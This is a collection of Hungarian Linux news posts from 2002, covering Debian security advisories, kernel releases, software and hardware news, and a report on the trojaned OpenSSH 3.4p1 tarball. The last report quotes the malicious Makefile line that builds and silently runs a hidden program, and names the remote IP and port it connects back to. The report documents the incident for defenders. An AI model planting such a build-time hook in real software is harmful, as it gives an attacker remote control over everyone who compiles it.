Egy újonan induló portálhoz keresek segitséget.

http://ers.linuxforum.hu | Illetve WineX 2.0 és 2.1 es debek és rpm-ek ugyanitt elérhet?ek. Szeretettel várom a leveleket: thuglife@linuxforum.hu

Csomag: openafs

Sebezhet?ség: egész túlcsordulás

Proobléma-típus: távoli

Debian-specifikus: nem



Egy egész túlcsordulási hibát fedeztek fel az RPC könyvtárban amit az OpenAFS adatbázisszerver használ, és az említett könyvtár a SunRPC könyvtárból származik. Ezt a hibát ki lehet használni hogy összeomlasszunk bizonyos OpenAFS szervereket (volserverr, vlserverr, ptserver, buserver) vagy jogosulatlanul root hozzáférést szerezzünk, egy olyan gépen, ami futtatja a fenti processzek valamelyikét. Még nem ismeretes léteez? exploit a hibára.A problémát javítja az 1.2.3final2-6 verzió az aktuális stabil disztribúcióban (woody) és a 1.2.6-1 verzió az aktuális unstabil disztribúcióban (sid).

A Debian 2.2 (potato) nem érintett, lévén az még nem tartalmazza az OpenAFS csomagokatt.



Javasoljuk, hogy frissítsd az OpenAFS csomagjaid.

Martin Schultze levele a debian-security-announce listán.

A frissítésr?l szóló FAQ-nk.

Csomag: libpng, libpng3

Sebezhetőség: Puffer-túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem



Kiegészítésként a DSA-140-1-es biztonsági hibajegyhez az alábbi csomagok javítást tartalmaznak egy lehetséges puffer-túlcsordulási hibára. A PNG könyvtár megvalósít egy biztonsági-ráhagyást, amit szintén betettek az "upstream" kiadásba. Köszönet illeti Glenn Randers-Pehrson-t, aki informálta a Debian Security Team-et.A problémát javítja az 1.0.12-3.woody.2 libpng verzió és az 1.2.1-1.1.woody.2 -es libpng3 verzió az aktuális stabil disztribúcióban (wooddy).



Javasoljuk, hogy frissítsd a libpng csomagjaid.



Martin Schultze levele a debian-security-announce listán.

A frissítésről szóló FAQ-nk.

Az IBM pénteken bejelentette, hogy az eddigi 16 helyett már 32 gépre tanúsított az IBM Cluster 1600.Az egyenként legfeljebb 32 Power4 processzort tartalmazó, 32 csomópontig skálázható cluster az IBM saját Unixát, az AIX-ot futtatja. A szerverek particionálhatóak, amelyeken AIX, vagy Linux futhat. A clustert alkotó számítógépek p690-esek (32 processzor), vagy p670-esek (16 processzor) lehetnek, amelyek közül az előbbi 1,1 GHz-es, vagy 1,3 GHz-es processzorokat, míg az utóbbi csak 1,1 GHz-eseket tartalmazhat.

Egy két 32 processzort tartalmazó, p690-esből álló cluster és a hozzá tartozó vezérlő munkaállomás potom 2,4 millió amerikai dollárba kerül.

Kapcsolódó oldalak:

Az IBM bejelentése

Érdekes hírek terjengenek az Apple háza táján. Egyesek szerint a cég szép lassan leáll az IBM/Motorola által gyártott PowerPC processzorokra épített gépekkel és a nagyobb teljesítményű Intel chipekre vált.A lehetőség még júluisban merült fel, amikor is Steve Jobs, a cég első embere halványan célozgatott arra, hogy a Motorola chipekről Intelre váltanának a jövőben. Ezután megkezdődtek a találgatások.

Sokak szerint a PPC architektúra sebességben egyre jobban elmarad az Intel által forgalmazott processzorokétól, hiszen míg a Motorola/IBM G4-es legfeljebb 1 GHz-en fut, az Intel lassan eléri a 3 GHz-et, ráadásul az Apple ezt a teljesítményt meglehetősen borsos áron kínálja. Miközben az Apple részesedése az (amerikai) asztali számítógépek piacából 10%-ról 2,4%-ra esett, a cégnek gyorsan meg kell hoznia a döntését.

Kapcsolódó oldalak:

Találgatások egy (láthatóan) PC fan szemszögéből

"Az Apple lefeküdni készül az Intellel"

A Sun Microsystems bejelentette következő operációs rendszerével, a Solaris 10-zel kapcsolatos terveit.A Solaris 9 idén májusi megjelenése után a Sun már gőzerővel dolgozik a következő kiadáson, a Solaris 10-es verzióján (bár ez a név a megjelenésig elképzelhető, hogy még változik). A 10-es verzió kiadása 2004-2005 magasságában várható.

Bill Moffitt, a Sun Solaris termékmenedzsere elmondta, hogy a Solaris 10 jelenlegi elsődleges célja a TCO, azaz a Total Cost of Ownership további minimalizálása. Nagy hangsúlyt kívánnak fektetni a teljesítmény és a menedzselhetőség javítására, beleértve a nagyszámú telepítések kérdésének megoldását is.

"Gyakorlatilag arról van szó, hogy miként lehet minél több rendszert menedzselni, minél kevesebb erőforrással", mondta Moffitt.

A Solaris 10 megjelenése előtt azonban még számos új funkciót kívánnak kifejleszteni, amelyek elérhetőek lesznek a most aktuális és a jövőben megjelenő rendszerben is.

Az egyik ilyen új funkció, amelyet a jövő év elején terveznek piacra dobni a Secure WAN boot nevű szolgáltatás, amely az Internetről való rendszerfrissítést teszi lehetővé (jaj). Még ebben az évben megjelenik a Sun állítása szerint az IPQoS, amely sávszélesség menedzsment fejlesztésekkel ruházza fel a Solarist. Ezzel lehetővé válik, hogy a rendelkezésre álló sávszélesség például 80%-át e-mail forgalomra, 20%-át pedig a webes szolgáltatásokra oszthassuk ki.

2003-ra van tervbe véve a Physical Memory Control, amely lehetővé teszi, hogy bizonyos alkalmazások fizikai memóriát allokálhassanak maguknak.

A Memory Placement Optimization, amely szintén ebben az évben válik hozzáférhetővé azt teszi lehetővé, hogy az operációs rendszeren belül a memória az érintett processzor számára minél "közelebb" legyen, amely főleg a nagyteljesítményű gépeknél, mint például a Sun Fire 6800 számíthat.

Egy egyszerűsített "container GUI" is szerepel a tervek között, amely a Solaris containerek (virtuális szerverek) adminisztrálását könnyítené meg.

A Solaris 9-hez készül még a telepítéskori "hardening", amely az olyan tradícionális eszközök eltávolítását mint az ftp, telnet és sendmail teszi majd lehetővé, amelyekre általában nincs szükség.

Kapcsolódó oldalak:

Az InfoWorld cikke

A G.O.B.I.E., azaz a Graphic OpenBSD Installation Engine egy olyan projekt, amelyet Theo de Raadt egészen biztosan messziről el fog kerülni :)
A G.O.B.I.E. célja egy grafikus telepítő létrehozása OpenBSD-hez, amelyet hat francia diák indított el nemrég. A telepítő maga az XFree86 4.2.0-ás verzióját és jónéhány újraírt, a rendszer beállításához szükséges alkalmazást (pld. disklabel és fdisk) tartalmaz. A csapat ígérete szerint nemsokára letölthető lesz egy ISO is, amely már ezt az installert használja.

Kapcsolódó oldalak:
A projekt weblapja
OpenBSD

Elmegyek nyaralni, nem leszek számítógépközelben egy hétig. Aggódni nem kell :-), szerintem bra és gyu frissíteni fogják az oldalt, ha idejük engedi. Ahova megyek ott nem lesz internet kapcsolat (világ vége), az egyedüli kapcsolatom a külvilággal a communikátorom lesz. Olvasni fogom tudni az oldalt, de postolni sajnos a mostani mobil-internet árak mellett szinte képtelenség lenne :-( (nem, nincs GPRS-em. még...)

Sebaj, egy hét múlva itt vagyok =)

Megjelent a legfrissebb stabil kernel, a 2.4.19-es. Változás nem történt, a release candidate 5 került végül kiadásra.

Letölthető FULL, patch.

Változások:final:

- 2.4.19-rc5 was released as 2.4.19 with no changes.

Summary of changes from v2.4.19-rc4 to v2.4.19-rc5

============================================

(02/08/01 1.662)

[PATCH] Correct openprom fix

(02/07/31 1.661)

[PATCH] Add missing check to openprom driver

(02/08/01 1.663)

[PATCH] disable READA

(02/08/01 1.664)

Change EXTRAVERSION to -rc5

Ma írtam, hogy a TheKompany cég kiadott egy tkcvideo nevű programot a Sharp linux-alapú kézi gépére, amellyel akár DivX formátumú filmeket nézhetünk a kütyün. Viccből megemlítettem, hogy portolni kellene az MPlayert Zaurus-ra, mert a tkcvideo nem ingyenes, meg az MPlayer amúgy is a szívem egyik csücske ;)

Hát elkéstem a portolási felhívással. Árpi hívta fel a figyelememet arra, hogy valaki már említette az mplayer-users@ listán, hogy az MPlayer működik a Sharp Zaurus-on.

Nem is olyan rég elkezdett feltünedezni a Mandrake 9.0 BETA2 verziója a mirrorokon.


Vettem a bátorságot, hogy legyen magyar is ebből :)

A Transgaming.com tegnap bejelentette a Winex 2.1-et, mellyel lehetőségünk nyílik az eddiginél jóval több windowsra írt játékot futtani Linux alatt. A Transgamerek letölthetik (nem ingyen) a winex 2.1-et RPM, DEB, és TGZ csomagban. Az oldalon olvashatjuk a szokásos szöveget, a Transgaming fejlesztőinek sikerült a világ eddig leggyorsabban fogyó játékát, a WarCraft III-at is futtani Linux alatt a winex segítségével. Ezen kívül még olyan játékok működnek a winex új verziójával, mint a Civilization 3, Grand Theft Auto 3 a Black & White, stb. Ebben a verzióban már működik a WarCraft III-ban a video betétéek (cutscenes) lejátszása is.

Featurek:- Support for WarCraft III in OpenGL mode

- Support for Civilization III, version 1.0 and 1.07. Version 1.21 is not yet supported due to copy protection issues.

- Support for Black and White.

- Support for Grand Theft Auto 3.

- Fixes to DXGrab and XVidMode code to better support full-screen modes

- Various improvements to DirectSound and Wave audio

- Better support for DirectX version detection.

- Improved keyboard focus support for some games.

- Faster copy protection code. In some cases, copy protection wait times have been reduced by more than 50%. Other cases remain slow, however. For users of Panasonic DVD drives, be aware that a previous Panasonic-specific workaround has been removed from WineX 2.1 after testing revealed that did not appear to be necessary on recent 2.4 series Linux kernel releases.

Teljes változások logja itt.

CVS és letöltés itt.

Csomag: mpack

Sebezhetőség: buffer overflow

Probléma típusa: távoli

Debian specifikus: nem




Eckehard Berns egy nem debian specifikus puffertúlcsordulást felfedezett fel a mupack programban, amit binaris - MIME dekódoláshoz használnak e-mail-ekben. Ezzel a hibával akár tetszőleges kód is lefuttatható. Azonnali frissítés javasolt...A problémát az 1.5-5potato2 csomag javítja a régi stabil disztribúcióban (potato), az 1.5-7woody2 csomag javítja az aktuális stabil disztribúcióban (woody), és az 1.5-9 csomag javítja az unstable disztribúcióban (sid).

Debian Security listán megjelent hír

Hmm, már régebben is meg akartam írni ezt a dolgot, de valahogy mindig elmaradt. A mai magyar online Linux oldalak hozzáállásával és mentalitásával kapcsolatban.

Naponta nézem a külföldi, és a magyar Unix, Linux online újságokat. Itt nálunk azt vettem észre, hogy egy részük (itt felhívom a figyelmet arra, hogy tisztelet a kivételnek, és akinek nem inge...., stb, mielőtt még óriási flame lenne a dologból) ötlettelen, és nem csinál mást mint, más oldalakról szó szerint kopizza (igen-igen cut & paste) a híreket. Ezzel csak egy bajom van. Ahogy végignézem a magyar oldalakat mindenhol ugyanazt a cikket látom. Ennek semmi értelme. Nincs értelme annak, hogy egy oldalra valaki beküld egy hírt, vagy az ottani team készít egy hírt, és azt más oldalra bemásolják, beküldik.Hogy miért nincs értelme? Mert kis ország vagyunk, és mindannyian tudjuk, hogy mik azok az oldalak amit meg kell látogatni nap-mint-nap. És nagyon kellemetlen több oldalon is ugyanazokkal a cikkekkel találkozni. (Főleg úgy, hogy több oldalon keresztül van a hír idézve, és az utolsó oldalon már teljesen másról szól. Ugye ismerjük a szájról-szájra terjedő híreket?)

Ennek elkerülése végett kérek minden cikk beküldőt, hogy NE idézzen ide, és NE küldjön be ide olyan hírt, amely megjelent más magyar oldalon. Erre egyébként ki is térek az éppen formálódó site FAQ-ban a Miért nem közölted le a cikkemet? pontban. Ezzel elkerülhetővé válik az, hogy egyhangú, unalmas, és ötlettelen legyen a magyar online Linux/Unix hírszolgáltatás.

Az előző cikket azért közöltem le, mert ez a tipikus példája annak, ahogy NE küldjünk be cikket. Küldjük be esetleg az érdekes cikk címét, és a rá mutató _pontos_ URL-t. Ez bőven elég.

Azoknak az oldalaknak a figyelmébe, akik innen cikket idéznek:

Kéretik a fentieket betartani. Nem az egész cikket lemásolni, hanem egy hivatkozást tenni rá. Okom van ezt kérni. Ugyanis több alkalommal történt olyan, hogy nem szó szerint idéztek innen cikket, a kedves újságíró saját szavaival egészítette ki a hírt, más címet adott neki, és természetesen a cikk más jelentéssel is bírt ezek után. A problémát jeleztem neki, miután a hírt kijavították.

Köszönettel:

-trey

9,2 teraflop kapacitású HP-szuperszámítógépet telepítenek az Egyesült Államokban, amely a legnagyobb Grid számítógépes erőforrás lesz a világon.A gép első teraflopnyi kapacitását augusztus végéig kötik össze a DOE Science Griddel, amelynek kiszolgálóegységei között ez lesz az első szuperszámítógép. A teljes, 9,2 teraflop kapacitás várhatóan 2003 tavaszán áll majd rendelkezésre.

A PNNL által megvásárolt HP-szuperszámítógépet az év első felében, a világ legnagyobb teljesítményű Linux-alapú szuperkomputereként ismerhették meg az érdeklődők. A párhuzamos file-rendszerrel ellátott, kiegyensúlyozott rendszer minden eddiginél nagyobb teljesítményt tesz elérhetővé a tudományos felhasználói kör számára.

A DOE Science Grid létrehozására 2001-ben, az Energiaügyi Minisztérium SciDAC programja keretében került sor. A kezdeményezésben öt kutatólaboratórium, azaz a PNNL mellett a Lawrence Berkeley National Laboratory, a National Energy Research Scientific Computing Center, az Oak Ridge National Laboratory és az Argonne National Laboratory vesz részt.

Az amerikai és külföldi intézetek nagy volumenű szimulációs és adatelemzési feladatok elvégzésére, továbbá különféle, egymástól távol eső helyszínek között elosztott, felső kategóriás számítástechnikai erőforrásokat, adatbázisokat illetve berendezéseket igénylű tudományágak - köztük a kémia, a nagy energiájú fizika, a magfúzió, valamint az élettani és klímakutatások - kísérleteinek összehangolására használják a Grid-et. Az erőforrásokat igénybe vevő tudományos felhasználói bázis is többnyire a világ különböző pontjain, elszórtan található.

A HP szuperszámítógépét adathozzáférési és -átviteli, valamint számítási műveletek végrehajtására használhatják az érintettek. A rendszerbe érkező számítási igényeket az Energiaügyi Minisztérium PNNL-nél működő tudományos felhasználói létesítménye, a William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) pályáztatás alapján rangsorolja. Elsősorban azok, az emberiség előtt álló komolyabb kihívásokra összpontosító, nagyszabású projektek számíthatnak kedvező elbírálásra, amelyek kutatócsoportok vezetésével három éven keresztül kívánják vizsgálni az érintett problémát.

forrás: www.terminal.hu

Egy maréknyi NetBSD hír:

A TheKompany cég kiadott egy DivX szoftvert a GNU/Linux-alapú Sharp Zaurus SL-5500 kézi mobileszközre. A program neve tkcvideo.

The program támogatja az MPEG1, MPEG 2, MPEG 4 (DivX), MJPEG, vagy AVI filokat, és az mp1, mp2, és mp3 audio formátumokat.

Mostantól akár filmeket is nézhetünk a PDA-nkon.

Kép a folytatásban:

Zaurus akcióban

A Zaurus egy 128MB-os Compact Flash kártyával képes egy órányi filmet tárolni 240x320-as felbontásban. A tkcvideo mindent tud amit a "normális" lejátszók. Sajnos a program nem open source. A lejátszót a TheKompany weboldaláról lehet letölteni 15$ körüli áron. Demo verzió nem létezik belőle.

Talán az MPlayert lehetne portolni Zaurusra? :-)

Az éjjel született új fejlesztői kernel is. Linus kiadta a 2.5.30-as kernelt. A kernel számos fejlesztővel történt merge-t tartalmaz. Ezenkívül a legfontosabb változás egy komolyabb RPC bug javítása, mely NFS problémákat okozott az SMP gépeken.

Letölthető FULL, patch.

Változások logja itt.

Cox mester első foltja az rc5-höz megjelent. Ami jellemzi: HP merge, merge az rc5-tel, eepro frissítés, javítás gcc3-hoz, stb.

Letölthető patch-2.4.19-rc5-ac1.gz.

Változások:[+ indicates stuff that went to Marcelo, o stuff that has not,

* indicates stuff that is merged in mainstream now, X stuff that proved bad and was dropped out]

This patch contains SiS IDE updates. Usual caveats apply. The HP merge is now down to 4058 lines.

Linux 2.4.19rc5-ac1

o Merge with 2.4.19rc5

o Flush the right thing in ramdisk (HP merge)

o Merge further small hppa bits (HP merge)

o Fix ide option breakage (Mikael Petterson)

o Fix a JFFS2 oops case (David Woodhouse)

o Switch 'processor id' to 'physical id' (me)

| Keeps glibc happy until we sort out cpu numbers longer term

o Fix incorrect marking of phys_proc_id init (David Luyer)

o Update the experimental amd76x_pm code (Johnathan Hicks)

o EEPro10 update (Aristeu Sergio Rozanski Filho)

o Fix missing prototype (Christoph Hellwig)

o Make mount hash size more sensible (Christoph Hellwig)

o Make i386 semaphore implementation gcc3 safe (Christoph Hellwig)

o Remove dead code in alim15x3 IDE code (me)

o Make the i8x0 audio power up more conservative (me)

o Enable EAPD on i8x0 audio devices (me)

| Hopefully this will fix some of the 'silent laptop' problems

o Fix misordering in drivers/net/Config (Willy Tarreau)

o Fix undefined C usage in ixj (me)

o Fix undefined C usage in se401 (me)

o Kill __FUNCTION__ in some usb drivers (me)

Megjelent a Knoppix 3.1-es verziója. A rendszer KDE 3.02, OpenOffice.org 1.0, Gimp 1.2 csomagokkal és 2.4-es kernellel van felszerelve.

A KNOPPIX egy komplett GNU/Linux disztribúció, amely a nemrég megjelent Debian GNU/Linux 3.0 Woody terjesztésen alapul. A KNOPPIX egy bootolható CD-ről fut (live cd rendszer), és nem igényel telepítést a cél számítógépen. A terjesztés teljesen automatikus hardver detektálással, és teljes értékű KDE desktop környezettel rendelkezik. A KNOPPIX egy teljes értékű rescue rendszer.A rendszer segítségével akár TV-t nézhetünk, vagy akár CD-t is írhatunk. A KNOPPIX-ot használhatjuk Linux demo, oktatási célokra.

Rendszerkövetelmények:

Niels Provos bejelentette a trójai OpenSSH dolgot a security-announce@, misc@ és announce@ OpenBSD listákon. Mint kiderült több csomag is érintett. Az érintett verziók:

• OpenSSH version 3.2.2p1
• OpenSSH version 3.4p1
• OpenSSH version 3.4

A backdooros stuff július 30. és július 31. között került a szerverekre, és onnan kerültek át más szerverekre a normál mirrorozási folyamattal.

Kapcsolódó cikkek:
OpenSSH hiba ismét!
OpenSSH trójai!

Egy-két dolog kimaradt az rc4-ből, úgyhogy Tosatti kiadta az rc5-öt.

Letölthető patch-2.4.19-rc5.gz.

Változások:One of the -rc4 fixes was not correct and -rc4 missed an important SMP race "fix" on the block layer.

Summary of changes from v2.4.19-rc4 to v2.4.19-rc5

============================================

(02/08/01 1.662)

[PATCH] Correct openprom fix

(02/07/31 1.661)

[PATCH] Add missing check to openprom driver

(02/08/01 1.663)

[PATCH] disable READA

(02/08/01 1.664)

Change EXTRAVERSION to -rc5

Csomag: libpng2, libpng3

Támadhatóság: puffer-túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem



A PNG könyvtár fejlesztői kijavították a puffer-túlcsordulási hibát a progresszív olvasójában, ami akkor jön elő, ha a PNG adatfolyam több IDAT adatot tartalmaz mint amennyit az "IHDR chunk" jelez. Ilyen előkészített helytelen adatfolyamok összeomlasztják az alkalmazást, ami esetleg lehetővé teszi a támadó számra, hogy szabotáló kódot futtasson. Az olyan programok, mint a Galeon, Konqueror és számos más egyéb program használják ezeket a könyvtárakat.Hogy megtudd, hogy mely csomagok függenek ettől a könyvtártól futtasd a következő parancsokat:

    apt-cache showpkg libpng2
    apt-cache showpkg libpng3

Csomag: super

Támadhatóság: format string vulnerability

Probléma típus: helyi

Debian-specifikus: nem



A GOBBLES talált egy nem biztonságos használati módot a super csomag formátumsztringjeiben. A szuper nevű program arra való, hogy megfelelő rendszer-felhasználókhoz való hozzáférst adjon az néhány felhasználónak, úgy mint a szuper nevű program. (megj. most én nem értem rendesen az eredeti angol mondatot, vagy tényleg ilyen önrekurzív hülye módon fogalmazták meg? :-)) Kihasználva ezt a formátumsztring-támadhatóságot, a helyi felhasználók jogosulatlanul root hozzáférést szerezhetnek.A problémát a 3.12.2-2.1 javítja a régi stabil disztribúcióban (potato), a 3.16.1-1.1 javítja az aktuális stabil disztribúcióban (woody), és a 3.18.0-3 javítja az unstable disztribúcióban (sid).



Megj.: Olyan gyorsak voltunk, hogy a hír, még a debian-security archívumába se került be, de ha bekerül, vsz. ezen a linken fogod megtalálni :-)

A portolható OpenSSH forráskódjában trójai kódot fedezett fel Edwin Groothuis. Az ftp.openbsd.org-on és annak tükrein elérhető fájl MD5 ellenőrzőösszege:

MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

míg az eredeti fájlé:

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

Az eredetihez képest az openssh-3.4p1/openbsd-compat/Makefile.in fájl változott meg, amelyhez a következő sort adták:

all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

A bf-test.c fájl a portolható OpenSSH forráskódjában soha nem szerepelt és a Makefile.in CVS információi is kitaláltak, így a gyanú beigazolódni látszik.
A bf-test valójában egy shell scriptet állít elő, amely egy C forráskódot tartalmaz. A lefordított kód a 203.62.158.32-es (web.snsonline.net) IP cím 6667-es portjára kapcsolódik és távolról vezérelhetővé válik.